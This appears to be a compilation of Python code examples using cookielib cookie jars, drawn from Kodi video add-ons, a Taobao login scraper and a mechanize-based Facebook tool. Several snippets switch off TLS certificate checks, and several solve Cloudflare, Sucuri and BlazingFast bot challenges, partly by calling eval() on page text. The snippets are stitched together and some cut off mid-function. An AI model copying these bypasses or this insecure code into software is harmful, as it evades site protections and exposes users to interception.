        if (len(idmatch) > 0):
            playVideo('vimeo', idmatch[0])
    elif (newlink.find("youtube") > -1) and (newlink.find("playlists") > -1):
        playlistid = re.compile('playlists/(.+?)\?v').findall(newlink)
        vidlink = "plugin://plugin.video.youtube?path=/root/video&action=play_all&playlist=" + playlistid[
            0]
    elif (newlink.find("youtube") > -1) and (newlink.find("list=") > -1):
        playlistid = re.compile('videoseries\?list=(.+?)&').findall(newlink +
                                                                    "&")
        vidlink = "plugin://plugin.video.youtube?path=/root/video&action=play_all&playlist=" + playlistid[
            0]
    elif (newlink.find("youtube") > -1) and (newlink.find("/p/") > -1):
        playlistid = re.compile('/p/(.+?)\?').findall(newlink)
        vidlink = "plugin://plugin.video.youtube?path=/root/video&action=play_all&playlist=" + playlistid[
            0]
    elif (newlink.find("youtube") > -1) and (newlink.find("/embed/") > -1):
        playlistid = re.compile('/embed/(.+?)\?').findall(newlink + "?")
        vidlink = getYoutube(playlistid[0])
    elif (newlink.find("youtube") > -1):
        match = re.compile(
            '(youtu\.be\/|youtube-nocookie\.com\/|youtube\.com\/(watch\?(.*&)?v=|(embed|v|user)\/))([^\?&"\'>]+)'
        ).findall(newlink)
        if (len(match) == 0):
            match = re.compile(
                'http://www.youtube.com/watch\?v=(.+?)&dk;').findall(newlink1)
        if (len(match) > 0):
            lastmatch = match[0][len(match[0]) - 1].replace('v/', '')
        print "in youtube" + lastmatch[0]
        vidlink = lastmatch
        playtype = "youtube"
    else:
        sources = []
        label = name
        hosted_media = urlresolver.HostedMediaFile(url=newlink, title=label)
        sources.append(hosted_media)
        source = urlresolver.choose_source(sources)
        print "inresolver=" + newlink
        if source:
            vidlink = source.resolve()
        else:
            vidlink = ""
    playVideo(playtype, vidlink)
예제 #17
0
 def createCookieJarHandler(self):
     """
     Create cookie jar handler. used when keep cookie at login.
     """
     cookieJar = cookielib.LWPCookieJar()
     return urllib2.HTTPCookieProcessor(cookieJar)
예제 #18
0
def keluar():
    simpan()
    tampil('\rm[!]Keluar')
    os.sys.exit()


log = 0
id_bteman = []
id_bgroup = []
fid_bteman = []
fid_bgroup = []
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_equiv(True)
br.set_handle_referer(True)
br.set_cookiejar(cookielib.LWPCookieJar())
br.set_handle_redirect(True)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [(
    'User-Agent',
    'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16'
)]


def bacaData():
    global fid_bgroup, fid_bteman
    try:
        fid_bgroup = open(os.sys.path[0] + '/MBFbgroup.txt', 'r').readlines()
    except:
        pass
    try:
예제 #19
0
import cookielib
import urllib2

cookiejar = cookielib.LWPCookieJar()
http_handler = urllib2.HTTPHandler(debuglevel=1)
opener = urllib2.build_opener(http_handler,
                              urllib2.HTTPCookieProcessor(cookiejar))
urllib2.install_opener(opener)
#url = 'https://www.orange.sk/'
url = 'https://www.idcourts.us/repository/start.do'
req = urllib2.Request(url, None)
cookie = cookiejar[0]
print cookie.value
"""
s = opener.open(req)
print cookiejar
url = 'https://www.idcourts.us/repository/partySearch.do'
req = urllib2.Request(url, None)
s = opener.open(req)
print cookiejar
url = 'https://www.idcourts.us/repository/start.do'
req = urllib2.Request(url, None)
s = opener.open(req)
print cookiejar
url = 'https://www.idcourts.us/repository/partySearch.do'
req = urllib2.Request(url, None)
s = opener.open(req)
print cookiejar
"""
예제 #20
0
def request(url,
            close=True,
            redirect=True,
            error=False,
            proxy=None,
            post=None,
            headers=None,
            mobile=False,
            XHR=False,
            limit=None,
            referer=None,
            cookie=None,
            compression=True,
            output='',
            timeout='30'):
    try:
        if not url:
            return

        handlers = []

        if not proxy == None:
            handlers += [
                urllib2.ProxyHandler({'http': '%s' % (proxy)}),
                urllib2.HTTPHandler
            ]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)

        if output == 'cookie' or output == 'extended' or not close == True:
            cookies = cookielib.LWPCookieJar()
            handlers += [
                urllib2.HTTPHandler(),
                urllib2.HTTPSHandler(),
                urllib2.HTTPCookieProcessor(cookies)
            ]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)

        try:
            import platform
            node = platform.node().lower()
        except:
            node = ''

        if (2, 7, 8) < sys.version_info < (2, 7, 12) or node == 'xboxone':
            try:
                import ssl
                ssl_context = ssl.create_default_context()
                ssl_context.check_hostname = False
                ssl_context.verify_mode = ssl.CERT_NONE
                handlers += [urllib2.HTTPSHandler(context=ssl_context)]
                opener = urllib2.build_opener(*handlers)
                opener = urllib2.install_opener(opener)
            except:
                pass

        if url.startswith('//'): url = 'http:' + url

        _headers = {}
        try:
            _headers.update(headers)
        except:
            pass
        if 'User-Agent' in _headers:
            pass
        elif not mobile == True:
            #headers['User-Agent'] = agent()
            _headers['User-Agent'] = cache.get(randomagent, 1)
        else:
            _headers['User-Agent'] = 'Apple-iPhone/701.341'
        if 'Referer' in _headers:
            pass
        elif referer is not None:
            _headers['Referer'] = referer
        if not 'Accept-Language' in _headers:
            _headers['Accept-Language'] = 'en-US'
        if 'X-Requested-With' in _headers:
            pass
        elif XHR == True:
            _headers['X-Requested-With'] = 'XMLHttpRequest'
        if 'Cookie' in _headers:
            pass
        elif not cookie == None:
            _headers['Cookie'] = cookie
        if 'Accept-Encoding' in _headers:
            pass
        elif compression and limit is None:
            _headers['Accept-Encoding'] = 'gzip'

        if redirect == False:

            #old implementation
            #class NoRedirection(urllib2.HTTPErrorProcessor):
            #    def http_response(self, request, response): return response

            #opener = urllib2.build_opener(NoRedirection)
            #opener = urllib2.install_opener(opener)

            class NoRedirectHandler(urllib2.HTTPRedirectHandler):
                def http_error_302(self, req, fp, code, msg, headers):
                    infourl = urllib.addinfourl(fp, headers,
                                                req.get_full_url())
                    infourl.status = code
                    infourl.code = code
                    return infourl

                http_error_300 = http_error_302
                http_error_301 = http_error_302
                http_error_303 = http_error_302
                http_error_307 = http_error_302

            opener = urllib2.build_opener(NoRedirectHandler())
            urllib2.install_opener(opener)

            try:
                del _headers['Referer']
            except:
                pass

        if isinstance(post, dict):
            post = utils.byteify(post)
            post = urllib.urlencode(post)

        url = utils.byteify(url)

        request = urllib2.Request(url, data=post)
        _add_request_header(request, _headers)

        try:
            response = urllib2.urlopen(request, timeout=int(timeout))
        except urllib2.HTTPError as response:

            if response.code == 503:
                cf_result = response.read(5242880)
                try:
                    encoding = response.info().getheader('Content-Encoding')
                except:
                    encoding = None
                if encoding == 'gzip':
                    cf_result = gzip.GzipFile(
                        fileobj=StringIO.StringIO(cf_result)).read()

                if 'cf-browser-verification' in cf_result:

                    netloc = '%s://%s' % (urlparse.urlparse(url).scheme,
                                          urlparse.urlparse(url).netloc)

                    if not netloc.endswith('/'): netloc += '/'

                    ua = _headers['User-Agent']

                    cf = cache.get(cfcookie().get, 168, netloc, ua, timeout)

                    _headers['Cookie'] = cf

                    request = urllib2.Request(url, data=post)
                    _add_request_header(request, _headers)

                    response = urllib2.urlopen(request, timeout=int(timeout))
                else:
                    log_utils.log(
                        'Request-Error (%s): %s' % (str(response.code), url),
                        log_utils.LOGDEBUG)
                    if error == False: return
            else:
                log_utils.log(
                    'Request-Error (%s): %s' % (str(response.code), url),
                    log_utils.LOGDEBUG)
                if error == False: return

        if output == 'cookie':
            try:
                result = '; '.join(
                    ['%s=%s' % (i.name, i.value) for i in cookies])
            except:
                pass
            try:
                result = cf
            except:
                pass
            if close == True: response.close()
            return result

        elif output == 'geturl':
            result = response.geturl()
            if close == True: response.close()
            return result

        elif output == 'headers':
            result = response.headers
            if close == True: response.close()
            return result

        elif output == 'chunk':
            try:
                content = int(response.headers['Content-Length'])
            except:
                content = (2049 * 1024)
            if content < (2048 * 1024): return
            result = response.read(16 * 1024)
            if close == True: response.close()
            return result

        elif output == 'file_size':
            try:
                content = int(response.headers['Content-Length'])
            except:
                content = '0'
            response.close()
            return content

        if limit == '0':
            result = response.read(224 * 1024)
        elif not limit == None:
            result = response.read(int(limit) * 1024)
        else:
            result = response.read(5242880)

        try:
            encoding = response.info().getheader('Content-Encoding')
        except:
            encoding = None
        if encoding == 'gzip':
            result = gzip.GzipFile(fileobj=StringIO.StringIO(result)).read()

        if 'sucuri_cloudproxy_js' in result:
            su = sucuri().get(result)

            _headers['Cookie'] = su

            request = urllib2.Request(url, data=post)
            _add_request_header(request, _headers)

            response = urllib2.urlopen(request, timeout=int(timeout))

            if limit == '0':
                result = response.read(224 * 1024)
            elif not limit == None:
                result = response.read(int(limit) * 1024)
            else:
                result = response.read(5242880)

            try:
                encoding = response.info().getheader('Content-Encoding')
            except:
                encoding = None
            if encoding == 'gzip':
                result = gzip.GzipFile(
                    fileobj=StringIO.StringIO(result)).read()

        if 'Blazingfast.io' in result and 'xhr.open' in result:
            netloc = '%s://%s' % (urlparse.urlparse(url).scheme,
                                  urlparse.urlparse(url).netloc)
            ua = _headers['User-Agent']
            _headers['Cookie'] = cache.get(bfcookie().get, 168, netloc, ua,
                                           timeout)

            result = _basic_request(url,
                                    headers=_headers,
                                    post=post,
                                    timeout=timeout,
                                    limit=limit)

        if output == 'extended':
            try:
                response_headers = dict([(item[0].title(), item[1])
                                         for item in response.info().items()])
            except:
                response_headers = response.headers
            response_code = str(response.code)
            try:
                cookie = '; '.join(
                    ['%s=%s' % (i.name, i.value) for i in cookies])
            except:
                pass
            try:
                cookie = cf
            except:
                pass
            if close == True: response.close()
            return (result, response_code, response_headers, _headers, cookie)
        else:
            if close == True: response.close()
            return result
    except Exception as e:
        log_utils.log('Request-Error: (%s) => %s' % (str(e), url),
                      log_utils.LOGDEBUG)
        return
예제 #21
0
COOKIEFILE = 'cookies.lwp'  # the path and filename that you want to use to save your cookies in
import os.path

cj = None
ClientCookie = None
cookielib = None

try:  # Let's see if cookielib is available
    import cookielib
except ImportError:
    pass
else:
    import urllib2
    urlopen = urllib2.urlopen
    cj = cookielib.LWPCookieJar(
    )  # This is a subclass of FileCookieJar that has useful load and save methods
    Request = urllib2.Request

if not cookielib:  # If importing cookielib fails let's try ClientCookie
    try:
        import ClientCookie
    except ImportError:
        import urllib2
        urlopen = urllib2.urlopen
        Request = urllib2.Request
    else:
        urlopen = ClientCookie.urlopen
        cj = ClientCookie.LWPCookieJar()
        Request = ClientCookie.Request

####################################################
예제 #22
0
 def __init__(self):
     #登录的URL
     self.loginURL = "https://login.taobao.com/member/login.jhtml"
     #代理IP地址,防止自己的IP被封禁
     self.proxyURL = 'http://120.193.146.97:843'
     #登录POST数据时发送的头部信息
     self.loginHeaders = {
         'Host': 'login.taobao.com',
         'User-Agent':
         'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0',
         'Referer': 'https://login.taobao.com/member/login.jhtml',
         'Content-Type': 'application/x-www-form-urlencoded',
         'Connection': 'Keep-Alive'
     }
     #用户名
     self.username = '******'
     #ua字符串,经过淘宝ua算法计算得出,包含了时间戳,浏览器,屏幕分辨率,随机数,鼠标移动,鼠标点击,其实还有键盘输入记录,鼠标移动的记录、点击的记录等等的信息
     self.ua = '208UW5TcyMNYQwiAiwTR3tCf0J/QnhEcUpkMmQ=|Um5Ockt1TnRMdE91QXVMeC4=|U2xMHDJ+H2QJZwBxX39Rb1p0VHo9VD8RRxE=|VGhXd1llXGJZY1tjWGJWY1doX2JAfEl0THZKdUB4QH5BeUZ6RHpUAg==|VWldfS0RMQ04ADUVKRAwHnENaAVjHmQ0UW5KYSZLZTNl|VmNDbUMV|V2NDbUMV|WGRYeCgGZhtmH2VScVI2UT5fORtmD2gCawwuRSJHZAFsCWMOdVYyVTpbPR99HWAFYVMoRSlIM141SBZPCTlZJFkgCTYOMHtSbVVqJg8wCDd7BXsFJ1ozVD5XMBJ5HntSbVVqJggoBih+KA==|WWdHFysWKQk0FCgRLhY2AzkCIh4nHiMDNwo3FysSKxY2AzwAVgA=|WmBAED4QMAwsECoTRRM=|W2FBET8RMQwsEikWLXst|XGREFDplPngsVTxGPEIlXjJmWnRUBDAJNRUrFSp8XGFBb0FhXWNXaVBlM2U=|XWdHFzkXNwsrFykdIxsidCI=|XmREFDplPngsVTxGPEIlXjJmWnRUaEh0Sn5AeE0bTQ==|X2dHFzkXN2dTblNzTXdJHz8CIgwiAj4HOQw1C10L|QHpaCiR7IGYySyJYIlw7QCx4RGpKd1drUmxZYFQCVA==|QXtbCyVlMXgfcx5dO0I+Qxd2WHhEZFhhX2tQbTtt|QnpaCiQKKnpOc05uUGVZDy8SMhwyEi4XLhcqFUMV|Q3lZCSdnM3odcRxfOUA8QRV0WnpHZ1tiW2JfZDJk|RH5eDiBgNH0adhtYPkc7RhJzXX1BYV1kXWVabjhu|RX5eDiBgNH0adhtYPkc7RhJzXX1BelpnR3tCekdzThhO|Rn1dDSNjN34ZdRhbPUQ4RRFwXn5EfV1kRHhBeUd/RhBG|R3xcDCJiNn8YdBlaPEU5RBBxX39Ff19iQn5Hf0pzTBpM|SHNTAy1tOXAXexZVM0o2Sx9+UHBFf19iQn5HfEB5QhRC|SXJSAixsOHEWehdUMks3Sh5/UXFJdVVoSHRNdk1xTRtN|SnFRAS9vO3IVeRRXMUg0SR18UnJHZ1p6Rn9FeUJ9K30=|S3BQAC5uOnMUeBVWMEk1SBx9U3NLdlZrS3dOdEtxSB5I|THRUBCpqPmYacBV0CVEsRThZMhw8bFhlXX1EcU4YOAUlCyUFOQA0CDQKXAo=|TXdXBylpPXQTfxJRN04yTxt6VHRJaVVsWGRYbTtt|TndKd1dqSnVVaVBsTHJKcFBoXHxGfl5iXmdHe1tiX39BdVVpUHBOdFRqUXFNcVFvVnZIdlZjQ31BYV9iQn5FZVlhQX1EZFhmRnpFZVllRXlEZEV6WmVZDw=='
     #密码,在这里不能输入真实密码,淘宝对此密码进行了加密处理,256位,此处为加密后的密码
     self.password2 = '80559e9bbe990b2f09f2644d109865bef7de942b5117c7c2684aa31881460c81af5d11d571147111fa7a201746dba3f2d7373f05a0a8134e20e6abfab922c3c5722e8f5978ecf8a57612ef2842a758398960534cbee31121fc9a3483d1c3a64c5f3f97c6ff0f9652a96c9d8564c4cfb31fb6fd328e1feb76b97010319785f707'
     self.post = post = {
         'ua': self.ua,
         'TPL_checkcode': '',
         'CtrlVersion': '1,0,0,7',
         'TPL_password': '',
         'TPL_redirect_url':
         'http://i.taobao.com/my_taobao.htm?nekot=udm8087E1424147022443',
         'TPL_username': self.username,
         'loginsite': '0',
         'newlogin': '******',
         'from': 'tb',
         'fc': 'default',
         'style': 'default',
         'css_style': '',
         'tid':
         'XOR_1_000000000000000000000000000000_625C4720470A0A050976770A',
         'support': '000001',
         'loginType': '4',
         'minititle': '',
         'minipara': '',
         'umto': 'NaN',
         'pstrong': '3',
         'llnick': '',
         'sign': '',
         'need_sign': '',
         'isIgnore': '',
         'full_redirect': '',
         'popid': '',
         'callback': '',
         'guf': '',
         'not_duplite_str': '',
         'need_user_id': '',
         'poy': '',
         'gvfdcname': '10',
         'gvfdcre': '',
         'from_encoding ': '',
         'sub': '',
         'TPL_password_2': self.password2,
         'loginASR': '1',
         'loginASRSuc': '1',
         'allp': '',
         'oslanguage': 'zh-CN',
         'sr': '1366*768',
         'osVer': 'windows|6.1',
         'naviVer': 'firefox|35'
     }
     #将POST的数据进行编码转换
     self.postData = urllib.urlencode(self.post)
     #设置代理
     self.proxy = urllib2.ProxyHandler({'http': self.proxyURL})
     #设置cookie
     self.cookie = cookielib.LWPCookieJar()
     #设置cookie处理器
     self.cookieHandler = urllib2.HTTPCookieProcessor(self.cookie)
     #设置登录时用到的opener,它的open方法相当于urllib2.urlopen
     self.opener = urllib2.build_opener(self.cookieHandler, self.proxy,
                                        urllib2.HTTPHandler)
     #赋值J_HToken
     self.J_HToken = ''
     #登录成功时,需要的Cookie
     self.newCookie = cookielib.CookieJar()
     #登陆成功时,需要的一个新的opener
     self.newOpener = urllib2.build_opener(
         urllib2.HTTPCookieProcessor(self.newCookie))
     #引入工具类
     self.tool = Spider5_tool.Tool()
 def clear_cookies(self):
     self.cookie_jar = cookielib.LWPCookieJar()
     self.set_cookiejar(self.cookie_jar)
예제 #24
0
 def addCookie(self, cookie):
     global defaultCookieJar
     if defaultCookieJar is None:
         defaultCookieJar = cookielib.LWPCookieJar()
     defaultCookieJar.set_cookie(cookie)
예제 #25
0
def cfcookie(netloc, ua, timeout):
    try:
        headers = {'User-Agent': ua}

        req = urllib2.Request(netloc, headers=headers)

        try:
            urllib2.urlopen(req, timeout=int(timeout))
        except urllib2.HTTPError as response:
            result = response.read(5242880)

        jschl = re.findall('name="jschl_vc" value="(.+?)"/>', result)[0]

        init = re.findall('setTimeout\(function\(\){\s*.*?.*:(.*?)};',
                          result)[-1]

        builder = re.findall(r"challenge-form\'\);\s*(.*)a.v", result)[0]

        decryptVal = parseJSString(init)

        lines = builder.split(';')

        for line in lines:

            if len(line) > 0 and '=' in line:

                sections = line.split('=')
                line_val = parseJSString(sections[1])
                decryptVal = int(
                    eval(
                        str(decryptVal) + str(sections[0][-1]) +
                        str(line_val)))

        answer = decryptVal + len(urlparse.urlparse(netloc).netloc)

        query = '%s/cdn-cgi/l/chk_jschl?jschl_vc=%s&jschl_answer=%s' % (
            netloc, jschl, answer)

        if 'type="hidden" name="pass"' in result:
            passval = re.findall('name="pass" value="(.*?)"', result)[0]
            query = '%s/cdn-cgi/l/chk_jschl?pass=%s&jschl_vc=%s&jschl_answer=%s' % (
                netloc, quote_plus(passval), jschl, answer)
            time.sleep(5)

        cookies = cookielib.LWPCookieJar()
        handlers = [
            urllib2.HTTPHandler(),
            urllib2.HTTPSHandler(),
            urllib2.HTTPCookieProcessor(cookies)
        ]
        opener = urllib2.build_opener(*handlers)
        urllib2.install_opener(opener)

        try:
            req = urllib2.Request(query, headers=headers)
            urllib2.urlopen(req, timeout=int(timeout))
        except BaseException:
            pass

        cookie = '; '.join(['%s=%s' % (i.name, i.value) for i in cookies])

        return cookie
    except BaseException:
        pass
예제 #26
0
def request(url,
            close=True,
            redirect=True,
            error=False,
            proxy=None,
            post=None,
            headers=None,
            mobile=False,
            XHR=False,
            limit=None,
            referer=None,
            cookie=None,
            compression=True,
            output='',
            timeout='30',
            ignoreSsl=False,
            flare=True,
            ignoreErrors=None):
    try:
        if url is None:
            return None

        handlers = []

        if proxy is not None:
            handlers += [
                urllib2.ProxyHandler({'http': '%s' % (proxy)}),
                urllib2.HTTPHandler
            ]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)

        if output == 'cookie' or output == 'extended' or not close is True:
            cookies = cookielib.LWPCookieJar()
            handlers += [
                urllib2.HTTPHandler(),
                urllib2.HTTPSHandler(),
                urllib2.HTTPCookieProcessor(cookies)
            ]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)

        if ignoreSsl or ((2, 7, 8) < sys.version_info < (2, 7, 12)):
            try:
                import ssl
                ssl_context = ssl.create_default_context()
                ssl_context.check_hostname = False
                ssl_context.verify_mode = ssl.CERT_NONE
                handlers += [urllib2.HTTPSHandler(context=ssl_context)]
                opener = urllib2.build_opener(*handlers)
                opener = urllib2.install_opener(opener)
            except:
                pass

        if url.startswith('//'):
            url = 'http:' + url

        try:
            headers.update(headers)
        except:
            headers = {}

        if 'User-Agent' in headers:
            pass
        elif mobile is not True:
            # headers['User-Agent'] = agent()
            headers['User-Agent'] = cache.get(randomagent, 1)
        else:
            headers['User-Agent'] = 'Apple-iPhone/701.341'

        if 'Referer' in headers:
            pass
        elif referer is not None:
            headers['Referer'] = referer

        if 'Accept-Language' not in headers:
            headers['Accept-Language'] = 'en-US'

        if 'X-Requested-With' in headers:
            pass
        elif XHR is True:
            headers['X-Requested-With'] = 'XMLHttpRequest'

        if 'Cookie' in headers:
            pass
        elif cookie is not None:
            headers['Cookie'] = cookie

        if 'Accept-Encoding' in headers:
            pass
        elif compression and limit is None:
            headers['Accept-Encoding'] = 'gzip'

        if redirect is False:

            class NoRedirection(urllib2.HTTPErrorProcessor):
                def http_response(self, request, response):
                    return response

            opener = urllib2.build_opener(NoRedirection)
            opener = urllib2.install_opener(opener)

            try:
                del headers['Referer']
            except:
                pass

        if isinstance(post, dict):
            # Gets rid of the error: 'ascii' codec can't decode byte 0xd0 in position 0: ordinal not in range(128)
            for key, value in post.iteritems():
                try:
                    post[key] = value.encode('utf-8')
                except:
                    pass

            post = urlencode(post)

        request = urllib2.Request(url, data=post)
        _add_request_header(request, headers)

        try:
            response = urllib2.urlopen(request, timeout=int(timeout))
        except urllib2.HTTPError as response:
            try:
                ignore = ignoreErrors and (int(response.code) == ignoreErrors
                                           or int(
                                               response.code) in ignoreErrors)
            except:
                ignore = False

            if not ignore:
                if response.code in [301, 307, 308, 503]:
                    cf_result = response.read(5242880)

                    try:
                        encoding = response.info().getheader(
                            'Content-Encoding')
                    except:
                        encoding = None

                    if encoding == 'gzip':
                        cf_result = gzip.GzipFile(
                            fileobj=StringIO(cf_result)).read()

                    if flare and 'cloudflare' in str(response.info()).lower():
                        try:
                            from openscrapers.modules import cfscrape
                            if isinstance(post, dict):
                                data = post
                            else:
                                try:
                                    data = parse_qs(post)
                                except:
                                    data = None

                            scraper = cfscrape.CloudScraper()
                            response = scraper.request(
                                method='GET' if post is None else 'POST',
                                url=url,
                                headers=headers,
                                data=data,
                                timeout=int(timeout))
                            result = response.content
                            flare = 'cloudflare'  # Used below
                            try:
                                cookies = response.request._cookies
                            except:
                                log_utils.error()
                        except:
                            log_utils.error()

                    elif 'cf-browser-verification' in cf_result:
                        netloc = '%s://%s' % (urlparse(url).scheme,
                                              urlparse(url).netloc)
                        ua = headers['User-Agent']
                        cf = cache.get(cfcookie().get, 168, netloc, ua,
                                       timeout)
                        headers['Cookie'] = cf
                        request = urllib2.Request(url, data=post)
                        _add_request_header(request, headers)
                        response = urllib2.urlopen(request,
                                                   timeout=int(timeout))
                    else:
                        log_utils.log(
                            'Request-Error (%s): %s' %
                            (str(response.code), url), log_utils.LOGDEBUG)
                        if error is False:
                            return None
                else:
                    log_utils.log(
                        'Request-Error (%s): %s' % (str(response.code), url),
                        log_utils.LOGDEBUG)
                    if error is False:
                        return None

        if output == 'cookie':
            try:
                result = '; '.join(
                    ['%s=%s' % (i.name, i.value) for i in cookies])
            except:
                pass
            try:
                result = cf
            except:
                pass

            if close is True:
                response.close()
            return result

        elif output == 'geturl':
            result = response.geturl()
            if close is True:
                response.close()
            return result

        elif output == 'headers':
            result = response.headers
            if close is True:
                response.close()
            return result

        elif output == 'chunk':
            try:
                content = int(response.headers['Content-Length'])
            except:
                content = (2049 * 1024)
            if content < (2048 * 1024):
                return
            result = response.read(16 * 1024)
            if close is True:
                response.close()
            return result

        if flare != 'cloudflare':
            if limit == '0':
                result = response.read(224 * 1024)
            elif limit is not None:
                result = response.read(int(limit) * 1024)
            else:
                result = response.read(5242880)

        try:
            encoding = response.info().getheader('Content-Encoding')
        except:
            encoding = None

        if encoding == 'gzip':
            result = gzip.GzipFile(fileobj=StringIO(result)).read()

        if 'sucuri_cloudproxy_js' in result:
            su = sucuri().get(result)

            headers['Cookie'] = su

            request = urllib2.Request(url, data=post)
            _add_request_header(request, headers)

            response = urllib2.urlopen(request, timeout=int(timeout))

            if limit == '0':
                result = response.read(224 * 1024)
            elif limit is not None:
                result = response.read(int(limit) * 1024)
            else:
                result = response.read(5242880)

            try:
                encoding = response.info().getheader('Content-Encoding')
            except:
                encoding = None
            if encoding == 'gzip':
                result = gzip.GzipFile(fileobj=StringIO(result)).read()

        if 'Blazingfast.io' in result and 'xhr.open' in result:
            netloc = '%s://%s' % (urlparse(url).scheme, urlparse(url).netloc)
            ua = headers['User-Agent']
            headers['Cookie'] = cache.get(bfcookie().get, 168, netloc, ua,
                                          timeout)
            result = _basic_request(url,
                                    headers=headers,
                                    post=post,
                                    timeout=timeout,
                                    limit=limit)

        if output == 'extended':
            try:
                response_headers = dict([(item[0].title(), item[1])
                                         for item in response.info().items()])
            except:
                response_headers = response.headers

            try:
                response_code = str(response.code)
            except:
                response_code = str(response.status_code
                                    )  # object from CFScrape Requests object.

            try:
                cookie = '; '.join(
                    ['%s=%s' % (i.name, i.value) for i in cookies])
            except:
                pass

            try:
                cookie = cf
            except:
                pass

            if close is True:
                response.close()
            return (result, response_code, response_headers, headers, cookie)
        else:
            if close is True:
                response.close()
            return result

    except Exception as e:
        # log_utils.error()
        log_utils.log('Request-Error: (%s) => %s' % (str(e), url),
                      log_utils.LOGDEBUG)
        return None
예제 #27
0
def request(url, close=True, redirect=True, error=False, proxy=None, post=None, headers=None, mobile=False, limit=None, referer=None, cookie=None, output='', timeout='30'):
    try:
        handlers = []

        if not proxy == None:
            handlers += [urllib2.ProxyHandler({'http':'%s' % (proxy)}), urllib2.HTTPHandler]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)


        if output == 'cookie' or output == 'extended' or not close == True:
            cookies = cookielib.LWPCookieJar()
            handlers += [urllib2.HTTPHandler(), urllib2.HTTPSHandler(), urllib2.HTTPCookieProcessor(cookies)]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)


        try:
            if sys.version_info < (2, 7, 9): raise Exception()
            import ssl; ssl_context = ssl.create_default_context()
            ssl_context.check_hostname = False
            ssl_context.verify_mode = ssl.CERT_NONE
            handlers += [urllib2.HTTPSHandler(context=ssl_context)]
            opener = urllib2.build_opener(*handlers)
            opener = urllib2.install_opener(opener)
        except:
            pass


        try: headers.update(headers)
        except: headers = {}
        if 'User-Agent' in headers:
            pass
        elif not mobile == True:
            #headers['User-Agent'] = agent()
            headers['User-Agent'] = cache.get(randomagent, 1)
        else:
            headers['User-Agent'] = 'Apple-iPhone/701.341'
        if 'Referer' in headers:
            pass
        elif referer == None:
            headers['Referer'] = '%s://%s/' % (urlparse.urlparse(url).scheme, urlparse.urlparse(url).netloc)
        else:
            headers['Referer'] = referer
        if not 'Accept-Language' in headers:
            headers['Accept-Language'] = 'en-US'
        if 'Cookie' in headers:
            pass
        elif not cookie == None:
            headers['Cookie'] = cookie


        if redirect == False:

            class NoRedirection(urllib2.HTTPErrorProcessor):
                def http_response(self, request, response): return response

            opener = urllib2.build_opener(NoRedirection)
            opener = urllib2.install_opener(opener)

            try: del headers['Referer']
            except: pass


        request = urllib2.Request(url, data=post, headers=headers)


        try:
            response = urllib2.urlopen(request, timeout=int(timeout))
        except urllib2.HTTPError as response:

            if response.code == 503:
                if 'cf-browser-verification' in response.read(5242880):

                    netloc = '%s://%s' % (urlparse.urlparse(url).scheme, urlparse.urlparse(url).netloc)

                    ua = headers['User-Agent']

                    cf = cache.get(cfcookie().get, 168, netloc, ua, timeout)

                    headers['Cookie'] = cf

                    request = urllib2.Request(url, data=post, headers=headers)

                    response = urllib2.urlopen(request, timeout=int(timeout))

                elif error == False:
                    return

            elif error == False:
                return


        if output == 'cookie':
            try: result = '; '.join(['%s=%s' % (i.name, i.value) for i in cookies])
            except: pass
            try: result = cf
            except: pass
            if close == True: response.close()
            return result

        elif output == 'geturl':
            result = response.geturl()
            if close == True: response.close()
            return result

        elif output == 'headers':
            result = response.headers
            if close == True: response.close()
            return result

        elif output == 'chunk':
            try: content = int(response.headers['Content-Length'])
            except: content = (2049 * 1024)
            if content < (2048 * 1024): return
            result = response.read(16 * 1024)
            if close == True: response.close()
            return result


        if limit == '0':
            result = response.read(224 * 1024)
        elif not limit == None:
            result = response.read(int(limit) * 1024)
        else:
            result = response.read(5242880)


        if 'sucuri_cloudproxy_js' in result:
            su = sucuri().get(result)

            headers['Cookie'] = su

            request = urllib2.Request(url, data=post, headers=headers)

            response = urllib2.urlopen(request, timeout=int(timeout))

            if limit == '0':
                result = response.read(224 * 1024)
            elif not limit == None:
                result = response.read(int(limit) * 1024)
            else:
                result = response.read(5242880)


        if output == 'extended':
            response_headers = response.headers
            response_code = str(response.code)
            try: cookie = '; '.join(['%s=%s' % (i.name, i.value) for i in cookies])
            except: pass
            try: cookie = cf
            except: pass
            if close == True: response.close()
            return (result, response_code, response_headers, headers, cookie)
        else:
            if close == True: response.close()
            return result
    except:
        return
예제 #28
0
    def get_cookie(self, netloc, ua, timeout):
        try:
            headers = {'User-Agent': ua}
            request = urllib2.Request(netloc)
            _add_request_header(request, headers)

            try:
                response = urllib2.urlopen(request, timeout=int(timeout))
            except urllib2.HTTPError as response:
                result = response.read(5242880)
                try:
                    encoding = response.info().getheader('Content-Encoding')
                except:
                    encoding = None
                if encoding == 'gzip':
                    result = gzip.GzipFile(fileobj=StringIO(result)).read()

            jschl = re.findall('name="jschl_vc" value="(.+?)"/>', result)[0]
            init = re.findall('setTimeout\(function\(\){\s*.*?.*:(.*?)};',
                              result)[-1]
            builder = re.findall(r"challenge-form\'\);\s*(.*)a.v", result)[0]
            decryptVal = self.parseJSString(init)
            lines = builder.split(';')

            for line in lines:
                if len(line) > 0 and '=' in line:
                    sections = line.split('=')
                    line_val = self.parseJSString(sections[1])
                    decryptVal = int(
                        eval(
                            str(decryptVal) + sections[0][-1] + str(line_val)))

            answer = decryptVal + len(urlparse(netloc).netloc)
            query = '%s/cdn-cgi/l/chk_jschl?jschl_vc=%s&jschl_answer=%s' % (
                netloc, jschl, answer)

            if 'type="hidden" name="pass"' in result:
                passval = re.findall('name="pass" value="(.*?)"', result)[0]
                query = '%s/cdn-cgi/l/chk_jschl?pass=%s&jschl_vc=%s&jschl_answer=%s' % (
                    netloc, quote_plus(passval), jschl, answer)
                time.sleep(6)

            cookies = cookielib.LWPCookieJar()
            handlers = [
                urllib2.HTTPHandler(),
                urllib2.HTTPSHandler(),
                urllib2.HTTPCookieProcessor(cookies)
            ]
